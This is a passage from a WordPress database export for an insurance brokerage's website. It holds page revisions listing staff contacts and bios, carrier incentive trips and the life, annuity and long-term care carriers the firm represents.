30px;\">Cheskel’s experience in sales and product design is immense. He has been enabling our agents to create custom portfolios designed to fully address their clients’ needs. Cheskel has earned a great deal of trust in the industry, and is respected by all agents for his extensive knowledge, input and opinion.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Joel Zicherman - Illustrations and Product Design</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 212 | <a href=\"mailto:joel@empireins.com\">joel@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Joel maintains constant contact with carriers to understand and evaluate new products and find niches that can benefit our agents. He understands the needs of the agents and their clients and is able to create the perfect product and illustration for each individual case.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\"></h4>\r\n<h4 style=\"text-align: justify;\">Chaya Klein - Licensing and New Business Processor</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 200 | <a href=\"mailto:chaya@empireins.com\">chaya@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Chaya has comprehensive knowledge in new business and underwriting. This allows her to review and evaluate any situation and then relay it to the underwriters for an offer. Her attention to detail along with her expertise ensures a job exceptionally well done to the complete satisfaction of our agents. When it comes to licensing and contracting, Chaya is the person. Her efficiency and perfection ensure a timely turnaround time and always with a smile.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Roisy Deutsch - Commissions and New Business Processor</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 211 | <a href=\"mailto:roisy@empireins.com\">roisy@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">David’s daughter has inherited her father’s intelligence and is an integral part of the intake process. Her quick grasp of concepts can be evidenced by her thorough review, correction, and completion of incoming applications. Upon processing, Roisy conducts any necessary follow up and ensures a quick turn-around, enabling EIB to deliver policies to our agents in a timely manner. At EIB we pride ourselves on delivering agent and broker commissions on the very same day they arrive in our office. Under Roisy’s direction, this complicated task is executed with precision and perfection every time.</p>','Meet the EIB Team','','publish','open','open','','meet-the-eib-team','','','2015-11-23 21:25:50','2015-11-23 21:25:50','',0,'http://www.empireins.com/?page_id=347',0,'page','',0),(348,1,'2015-07-25 15:58:24','2015-07-25 15:58:24','Learn more about the EIB Team below.\r\n<h4><a title=\"David Braver\" href=\"http://www.empireins.com/team-ember/david-braver/\">David Braver</a></h4>\r\n<h4><a title=\"Gitty Braver\" href=\"http://www.empireins.com/team-ember/gitty-braver/\">Gitty Braver</a></h4>\r\n<h4><a title=\"Cheskel Braver\" href=\"http://www.empireins.com/team-ember/cheskel-braver/\">Cheskel Braver</a></h4>\r\n<h4><a title=\"Joel Zicherman\" href=\"http://www.empireins.com/team-ember/joel-zicherman/\">Joel Zicherman</a></h4>\r\n<h4><a title=\"Mindy Hirsch\" href=\"http://www.empireins.com/team-ember/md-a-sdslk/\">Mindy Hirsch</a></h4>\r\n<h4><a title=\"Chaya Klein\" href=\"http://www.empireins.com/team-ember/new-client/\">Chaya Klein</a></h4>\r\n<h4><a title=\"Roisy Deutsch\" href=\"http://www.empireins.com/team-ember/client/\">Roisy Deutsch</a></h4>\r\n<h4><a title=\"Malky Fleischman\" href=\"http://www.empireins.com/team-ember/malky-fleischman/\">Malky Fleischman</a></h4>','Meet the EIB Team','','inherit','open','open','','347-revision-v1','','','2015-07-25 15:58:24','2015-07-25 15:58:24','',347,'http://www.empireins.com/347-revision-v1/',0,'revision','',0),(350,1,'2015-07-25 16:18:04','2015-07-25 16:18:04','<hr />\r\n\r\n<h4>David Braver - CEO and President</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 204 | <a href=\"mailto:david@empireins.com\">david@empireins.com</a>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">More than a decade ago, Mr. David Braver recognized the community’s need for a trusted, elite,</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">umbrella insurance brokerage firm. Initially founded as a family business, EIB has since</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">flourished while maintaining its core honesty, integrity and warmth. David’s expertise has</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">earned him the respect of underwriters and enabled him to create a highly reputable businesswhere</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">clients know they will receive the very best insurance coverage for their specific needs.</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">Extensive research is conducted before EIB considers a relationship with any carrier, and more</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">than thirty carriers are currently contracted with EIB. Since the founding of the company, many</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">agents have counted on the wisdom of Mr. David Braver; to help them protect their clients’</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">assets and families.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4>Gitty Braver - Controller</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 202 | <a href=\"mailto:gitty@empireins.com\">gitty@empireins.com</a>\r\n\r\n<hr />\r\n\r\n<h4>Cheskel Braver - Sales and Marketing Director</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 207 | <a href=\"mailto:cheskel@empireins.com\">cheskel@empireins.com</a>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">Cheskel’s experience in sales and product design, is immense. He has been enabling our agents</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">to create custom portfolios designed to fully address their clients’ needs. Cheskel has earned a</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">great deal of trust in the industry, and is respected by all agents for his extensive knowledge,</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">input and opinion.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4>Joel Zicherman - Illustrations and Product Design</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 212 | <a href=\"mailto:joel@empireins.com\">joel@empireins.com</a>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">Joel maintains constant contact with carriers to understand and evaluate new products and find</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">niches that can benefit our agents. He understands the needs of the agents and their clients and is</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">able to create the perfect product and illustration for each individual case.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4>Mindy Hirsch</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 201 | <a href=\"mailto:mindy@empireins.com\">mindy@empireins.com</a>\r\n\r\n<hr />\r\n\r\n<h4>Chaya Klein - Licensing and New Business Processor</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 200 | <a href=\"mailto:chaya@empireins.com\">chaya@empireins.com</a>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">Chaya has comprehensive knowledge in new business and underwriting. This allows her to</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">review and evaluate any situation and then relay it to the underwriters for an offer. Her attention</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">to detail along with her expertise ensures a job exceptionally well done to the complete</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">satisfaction of our agents.</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">When it comes to licensing and contracting, Chaya is the person. Her efficiency and perfection</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">ensure a timely turnaround time and always with a smile.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4>Roisy Deutsch - Commissions and New Business Processor</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 211 | <a href=\"mailto:roisy@empireins.com\">roisy@empireins.com</a>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">David’s daughter has inherited her father’s intelligence and is an integral part of the intake</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">process. Her quick grasp of concepts can be evidenced by her thorough review, correction, and</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">completion of incoming applications. Upon processing, Roisy conducts any necessary follow up</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">and ensures a quick turn-around, enabling EIB to deliver policies to our agents in a timely</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">manner.</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">At EIB we pride ourselves on delivering agent and broker commissions on the very same day</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">they arrive in our office. Under Roisy’s direction, this complicated task is executed with</p>\r\n<p class=\"p1\" style=\"padding-left: 30px;\">precision and perfection every time.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4>Malky Fleischman</h4>\r\nP: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 203 | <a href=\"mailto:malky@empireins.com\">malky@empireins.com</a>','Meet the EIB Team','','inherit','open','open','','347-revision-v1','','','2015-07-25 16:18:04','2015-07-25 16:18:04','',347,'http://www.empireins.com/347-revision-v1/',0,'revision','',0),(351,1,'2015-07-25 16:19:48','2015-07-25 16:19:48','<div class=\"page-post-sub-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients. By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field. Furthermore, you can follow your policy as it gets approved and issued, by visiting your customized portal on our website.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">Please feel free to contact us via email or give us a call at 718.218.9647.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">It is a privilege to have you here. …Welcome…</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">David Braver CEO & President</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\"><a title=\"Meet the EIB Team\" href=\"http://www.empireins.com/about-us/meet-the-eib-team/\">Learn more about the rest of the EIB Team...</a></div>','about us','','inherit','open','open','','9-revision-v1','','','2015-07-25 16:19:48','2015-07-25 16:19:48','',9,'http://www.empireins.com/9-revision-v1/',0,'revision','',0),(355,1,'2015-08-13 14:07:44','2015-08-13 14:07:44','','Commissions Department','','inherit','open','open','','223-autosave-v1','','','2015-08-13 14:07:44','2015-08-13 14:07:44','',223,'http://www.empireins.com/223-autosave-v1/',0,'revision','',0),(357,1,'2015-10-30 13:50:33','2015-10-30 13:50:33','<hr />\r\n\r\n<h4 style=\"text-align: justify;\">David Braver - CEO and President</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 204 | <a href=\"mailto:david@empireins.com\">david@empireins.com</a></p>\r\n<p style=\"padding-left: 30px;\">More than a decade ago, Mr. David Braver recognized the community’s need for a trusted, elite, umbrella insurance brokerage firm. Initially founded as a family business, EIB has since flourished while maintaining its core honesty, integrity and warmth. David’s expertise has earned him the respect of underwriters and enabled him to create a highly reputable business where clients know they will receive the very best insurance coverage for their specific needs. Extensive research is conducted before EIB considers a relationship with any carrier, and more than thirty carriers are currently contracted with EIB. Since the founding of the company, many agents have counted on the wisdom of Mr. David Braver; to help them protect their clients’ assets and families.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Gitty Braver - Controller</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 202 | <a href=\"mailto:gitty@empireins.com\">gitty@empireins.com</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Cheskel Braver - Sales and Marketing Director</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 207 | <a href=\"mailto:cheskel@empireins.com\">cheskel@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Cheskel’s experience in sales and product design is immense. He has been enabling our agents to create custom portfolios designed to fully address their clients’ needs. Cheskel has earned a great deal of trust in the industry, and is respected by all agents for his extensive knowledge, input and opinion.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Joel Zicherman - Illustrations and Product Design</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 212 | <a href=\"mailto:joel@empireins.com\">joel@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Joel maintains constant contact with carriers to understand and evaluate new products and find niches that can benefit our agents. He understands the needs of the agents and their clients and is able to create the perfect product and illustration for each individual case.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Mindy Hirsch</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 201 | <a href=\"mailto:mindy@empireins.com\">mindy@empireins.com</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Chaya Klein - Licensing and New Business Processor</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 200 | <a href=\"mailto:chaya@empireins.com\">chaya@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">Chaya has comprehensive knowledge in new business and underwriting. This allows her to review and evaluate any situation and then relay it to the underwriters for an offer. Her attention to detail along with her expertise ensures a job exceptionally well done to the complete satisfaction of our agents. When it comes to licensing and contracting, Chaya is the person. Her efficiency and perfection ensure a timely turnaround time and always with a smile.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Roisy Deutsch - Commissions and New Business Processor</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 211 | <a href=\"mailto:roisy@empireins.com\">roisy@empireins.com</a></p>\r\n<p style=\"text-align: justify; padding-left: 30px;\">David’s daughter has inherited her father’s intelligence and is an integral part of the intake process. Her quick grasp of concepts can be evidenced by her thorough review, correction, and completion of incoming applications. Upon processing, Roisy conducts any necessary follow up and ensures a quick turn-around, enabling EIB to deliver policies to our agents in a timely manner. At EIB we pride ourselves on delivering agent and broker commissions on the very same day they arrive in our office. Under Roisy’s direction, this complicated task is executed with precision and perfection every time.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Malky Fleischman</h4>\r\n<p style=\"text-align: justify;\">P: <span id=\"gc-number-0\" title=\"Call with Google Voice\">718- 218-9647</span> x 203 | <a href=\"mailto:malky@empireins.com\">malky@empireins.com</a></p>','Meet the EIB Team','','inherit','open','open','','347-revision-v1','','','2015-10-30 13:50:33','2015-10-30 13:50:33','',347,'http://www.empireins.com/347-revision-v1/',0,'revision','',0),(359,1,'2015-11-07 14:25:46','2015-11-07 14:25:46',' \r\n\r\nStay up to date on all of your pending cases with EIB\'s on line Case Status portal.','Case Status','','inherit','open','open','','45-autosave-v1','','','2015-11-07 14:25:46','2015-11-07 14:25:46','',45,'http://www.empireins.com/45-autosave-v1/',0,'revision','',0),(360,1,'2015-12-11 09:03:20','2015-12-11 09:03:20','<p> </p>\n<p>Ready to take an application or need to manage an in force policy? Everything you need is at your fingertips in the Forms Portal.</p>\n','Forms','','inherit','open','open','','46-autosave-v1','','','2015-12-11 09:03:20','2015-12-11 09:03:20','',46,'http://www.empireins.com/46-autosave-v1/',0,'revision','',0),(361,1,'2015-12-10 20:49:59','2015-12-10 20:49:59','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\n\n\n<hr />\n\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\n<ul>\n <li><strong>American National</strong>\n<ul>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2014/04/ANICO-2016_conference.pdf\" target=\"_blank\">2016 Marketing Conference</a></li>\n</ul>\n</li>\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\n <li><strong>John Hancock</strong>\n<ul>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\n</ul>\n</li>\n <li><strong>Lincoln Financial</strong></li>\n <li><strong>Mutual Of Omaha </strong>\n<ul>\n <li><strong> </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\n</ul>\n</li>\n <li><strong>Penn Mutual </strong>\n<ul>\n <li><a href=\"https://www.travelhq.com/events/pennmutualgoldeneagle2016/pretrip/home.mtc\" target=\"_blank\">2016 Golden Eagle</a></li>\n <li><a href=\"https://www.travelhq.com/events/pennmutualroyalblue2016/pretrip/home.mtc\" target=\"_blank\">2016 Royal Blue</a></li>\n</ul>\n</li>\n <li><strong>Transamerica</strong>\n<ul>\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\n</ul>\n</li>\n</ul>\n \n\n ','incentives','','inherit','open','open','','10-autosave-v1','','','2015-12-10 20:49:59','2015-12-10 20:49:59','',10,'http://www.empireins.com/10-autosave-v1/',0,'revision','',0),(362,1,'2015-11-07 15:00:43','2015-11-07 15:00:43','','2016 Insurance Summit','','inherit','open','open','','2016-jh-insurance-summit-flyer_producer','','','2015-11-07 15:01:00','2015-11-07 15:01:00','',10,'http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf',0,'attachment','application/pdf',0),(363,1,'2015-11-07 15:00:46','2015-11-07 15:00:46','','2016 South Africa Luxury Adventure','','inherit','open','open','','south-africa-producer','','','2015-11-07 15:01:28','2015-11-07 15:01:28','',10,'http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf',0,'attachment','application/pdf',0),(364,1,'2015-11-07 15:00:51','2015-11-07 15:00:51','','2016 Term Summit','','inherit','open','open','','term-summit-2016','','','2015-11-07 15:04:10','2015-11-07 15:04:10','',10,'http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf',0,'attachment','application/pdf',0),(365,1,'2015-11-07 15:01:51','2015-11-07 15:01:51','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 class=\"page-post-sub-content\">Insurance Company Incentives</h2>\r\n<ul>\r\n <li>American National</li>\r\n <li>Assurity: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li>John Hancock\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li>2016 Term Summit</li>\r\n</ul>\r\n</li>\r\n <li>Lincoln Financial</li>\r\n <li>Transamerica\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-11-07 15:01:51','2015-11-07 15:01:51','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(366,1,'2015-11-07 15:04:14','2015-11-07 15:04:14','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong></li>\r\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-11-07 15:04:14','2015-11-07 15:04:14','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(367,1,'2015-11-07 15:09:51','2015-11-07 15:09:51','[webpipesso f=\"annuity_product_search\" t=\"iframe\" width=\"100p\" height=\"500\"]','Annuity Product Search','','inherit','open','open','','317-autosave-v1','','','2015-11-07 15:09:51','2015-11-07 15:09:51','',317,'http://www.empireins.com/317-autosave-v1/',0,'revision','',0),(368,1,'2015-11-07 15:10:09','2015-11-07 15:10:09','[webpipesso f=\"product_information\" t=\"iframe\" width=\"100p\" height=\"500\"]','Life Product Search','','inherit','open','open','','315-autosave-v1','','','2015-11-07 15:10:09','2015-11-07 15:10:09','',315,'http://www.empireins.com/315-autosave-v1/',0,'revision','',0),(369,1,'2015-11-07 15:14:16','2015-11-07 15:14:16','<div class=\"page-post-sub-content\" style=\"text-align: justify;\">EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York of the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\r\n\r\n<hr />\r\n\r\n<h1>Life Insurance Carriers</h1>\r\n<div class=\"about-content\">\r\n<ul>\r\n <li>American General Life Companies</li>\r\n <li>American National (ANICO)\r\nAmeritas Life / Ameritas Life of NY\r\nAthene\r\nAthene NY</li>\r\n <li>AXA\r\nBanner Life\r\nCompanion of New York\r\nFirst MetLife Investors Insurance Company\r\nGenworth Life and Annuity Insurance Company\r\nGenworth Life Insurance Company\r\nGenworth Life Insurance Company of New York</li>\r\n <li>Guardian Life\r\nHartford\r\nJohn Hancock\r\nLincoln National Life Insurance Company</li>\r\n <li>Mass Mutual\r\nMetLife (All Companies)\r\nMinnesota Life</li>\r\n <li>National Life of Vermont\r\nNationwide</li>\r\n <li>Penn Mutual\r\nPrincipal Life Insurance Company\r\nPrincipal National Life Insurance Company</li>\r\n <li>Protective Life\r\nProtective Life and Annuity of NY\r\nPrudential Financial</li>\r\n <li>New York Life\r\nReliastar Life Insurance Company\r\nReliastar Life Insurance Company of New York\r\nSBLI (Savings Bank Life Insurance Co of Mass)\r\nSecurian Life Insurance Company\r\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Symetra Financial\r\nTransamerica Financial Life Insurance Co\r\nTransamerica Life Insurance Co.\r\nUnited of Omaha</li>\r\n <li>US Life\r\nVoya Financial\r\nWilliam Penn</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Annuity Carriers</h1>\r\n<ul>\r\n <li>AIG Annuities Fixed & Index</li>\r\n <li>AIG Annuities Fixed & Index of NY</li>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National</li>\r\n <li>Ameritas Life / Ameritas Life of NY</li>\r\n <li>Athene</li>\r\n <li>Athene Annuity & Life Assurance Company</li>\r\n <li>Columbus Life Insurance Company</li>\r\n <li>Companion of New York</li>\r\n <li>EquiTrust Life</li>\r\n <li>Fidelity & Guaranty Life</li>\r\n <li>Fidelity & Guaranty Life of NY</li>\r\n <li>First MetLife Investors Insurance Company</li>\r\n <li>Genworth Life and Annuity Insurance Company</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>Integrity Life Insurance Company</li>\r\n <li>Jackson National Life</li>\r\n <li>Jackson National Life of New York</li>\r\n <li>Lincoln National Life Insurance Company</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>National Integrity Life Insurance Company</li>\r\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\r\n <li>Nationwide</li>\r\n <li>New York Life</li>\r\n <li>North American Company for Life and Health Insurance®</li>\r\n <li>Penn Mutual</li>\r\n <li>Principal Life Insurance Company</li>\r\n <li>Protective Life</li>\r\n <li>Reliance Standard Life</li>\r\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Standard Insurance Company</li>\r\n <li>United of Omaha</li>\r\n <li>Voya Insurance and Annuity Company</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Long-Term Care Insurance Carriers</h1>\r\n<ul>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>Athene NY</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>John Hancock</li>\r\n <li>MassMutual</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>Mutual of Omaha</li>\r\n <li>New York Life</li>\r\n <li>Prudential Financial</li>\r\n</ul>\r\n<h3></h3>\r\n</div>','Carriers','','inherit','open','open','','185-revision-v1','','','2015-11-07 15:14:16','2015-11-07 15:14:16','',185,'http://www.empireins.com/185-revision-v1/',0,'revision','',0),(371,1,'2015-11-07 15:50:48','2015-11-07 15:50:48','<div>EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York of the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\r\n\r\n<hr />\r\n\r\n<h1>Life Insurance Carriers</h1>\r\n<div class=\"about-content\">\r\n<ul>\r\n <li>American General Life Companies</li>\r\n <li>American National (ANICO)\r\nAmeritas Life / Ameritas Life of NY\r\nAthene\r\nAthene NY</li>\r\n <li>AXA\r\nBanner Life\r\nCompanion of New York\r\nFirst MetLife Investors Insurance Company\r\nGenworth Life and Annuity Insurance Company\r\nGenworth Life Insurance Company\r\nGenworth Life Insurance Company of New York</li>\r\n <li>Guardian Life\r\nHartford\r\nJohn Hancock\r\nLincoln National Life Insurance Company</li>\r\n <li>Mass Mutual\r\nMetLife (All Companies)\r\nMinnesota Life</li>\r\n <li>National Life of Vermont\r\nNationwide</li>\r\n <li>Penn Mutual\r\nPrincipal Life Insurance Company\r\nPrincipal National Life Insurance Company</li>\r\n <li>Protective Life\r\nProtective Life and Annuity of NY\r\nPrudential Financial</li>\r\n <li>New York Life\r\nReliastar Life Insurance Company\r\nReliastar Life Insurance Company of New York\r\nSBLI (Savings Bank Life Insurance Co of Mass)\r\nSecurian Life Insurance Company\r\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Symetra Financial\r\nTransamerica Financial Life Insurance Co\r\nTransamerica Life Insurance Co.\r\nUnited of Omaha</li>\r\n <li>US Life\r\nVoya Financial\r\nWilliam Penn</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Annuity Carriers</h1>\r\n<ul>\r\n <li>AIG Annuities Fixed & Index</li>\r\n <li>AIG Annuities Fixed & Index of NY</li>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National</li>\r\n <li>Ameritas Life / Ameritas Life of NY</li>\r\n <li>Athene</li>\r\n <li>Athene Annuity & Life Assurance Company</li>\r\n <li>Columbus Life Insurance Company</li>\r\n <li>Companion of New York</li>\r\n <li>EquiTrust Life</li>\r\n <li>Fidelity & Guaranty Life</li>\r\n <li>Fidelity & Guaranty Life of NY</li>\r\n <li>First MetLife Investors Insurance Company</li>\r\n <li>Genworth Life and Annuity Insurance Company</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>Integrity Life Insurance Company</li>\r\n <li>Jackson National Life</li>\r\n <li>Jackson National Life of New York</li>\r\n <li>Lincoln National Life Insurance Company</li>\r\n <li>MetLife (All Companies)</li>\r\n 